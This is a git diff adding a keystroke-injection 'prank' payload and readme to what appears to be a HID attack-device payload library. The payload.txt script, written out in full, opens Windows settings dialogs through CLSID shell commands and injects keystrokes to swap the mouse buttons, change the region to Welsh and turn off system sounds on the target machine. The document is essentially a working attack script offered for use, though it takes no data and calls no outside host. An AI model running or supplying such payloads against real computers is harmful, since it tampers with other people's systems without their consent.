diff --git a/payloads/library/prank/Win_HID_BeAPest/payload.txt b/payloads/library/prank/Win_HID_BeAPest/payload.txt new file mode 100644 index 00000000..bc07186c --- /dev/null +++ b/payloads/library/prank/Win_HID_BeAPest/payload.txt @@ -0,0 +1,51 @@ +# Title: Be a pest using CLSID +# Description: Uses CLSID to open system dialogs to swap the left and right mouse button, change the region to Welsh and turn off system sounds. +# Author: Cribbit +# Version: 1.0 +# Category: Pranks +# Target: Windows 10 +# Attackmodes: HID + +LED SETUP + +ATTACKMODE HID + +# GET SWITCH_POSITION + +LED ATTACK + +QUACK DELAY 200 +# Swop Mouse buttons L <-> R +RUN WIN "shell:::{6C8EEC18-8D75-41B2-A177-8831D59D2D50}" +QUACK DELAY 200 +QUACK SPACE +QUACK DELAY 100 +QUACK ENTER +QUACK DELAY 100 +# Set region to Welsh +RUN WIN "shell:::{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}" +QUACK DELAY 200 +# Walser (Switzerland) +QUACK w +QUACK DELAY 100 +# Welsh +QUACK w +QUACK DELAY 100 +QUACK ENTER +QUACK DELAY 100 +# Turn off system sounds +RUN WIN "shell:::{F2DDFC82-8F12-4CDD-B7DC-D4FE1425AA4D}" +QUACK DELAY 200 +QUACK SHIFT TAB +QUACK DELAY 100 +QUACK RIGHTARROW +QUACK DELAY 100 +QUACK RIGHTARROW +QUACK DELAY 100 +QUACK TAB +QUACK DELAY 100 +QUACK UPARROW +QUACK DELAY 100 +QUACK ENTER + +LED FINISH \ No newline at end of file diff --git a/payloads/library/prank/Win_HID_BeAPest/readme.md b/payloads/library/prank/Win_HID_BeAPest/readme.md new file mode 100644 index 00000000..fa0fe60a --- /dev/null +++ b/payloads/library/prank/Win_HID_BeAPest/readme.md @@ -0,0 +1,25 @@ +# Be A Pest Using CLSID +- Author: Cribbit +- Version: 1.0 +- Tested on: Windows 10 +- Category: General +- Attackmode: HID +- Extensions: Run + +## Change Log +| Version | Changes | +| ------- | --------------- | +| 1.0 | Initial release | + +## Description +Uses CLSID to open system dialogs. +To swap the left and right mouse button. +Change the region to Welsh. +And turn off system sounds. + +## Colours +| Status | Colour | Description | +| -------- | ----------------------------- | --------------------------- | +| SETUP | Magenta solid | Setting attack mode | +| ATTACK | Yellow single blink | Injecting Keystrokes | +| FINISHED | Green blink followed by SOLID | Injection finished | \ No newline at end of file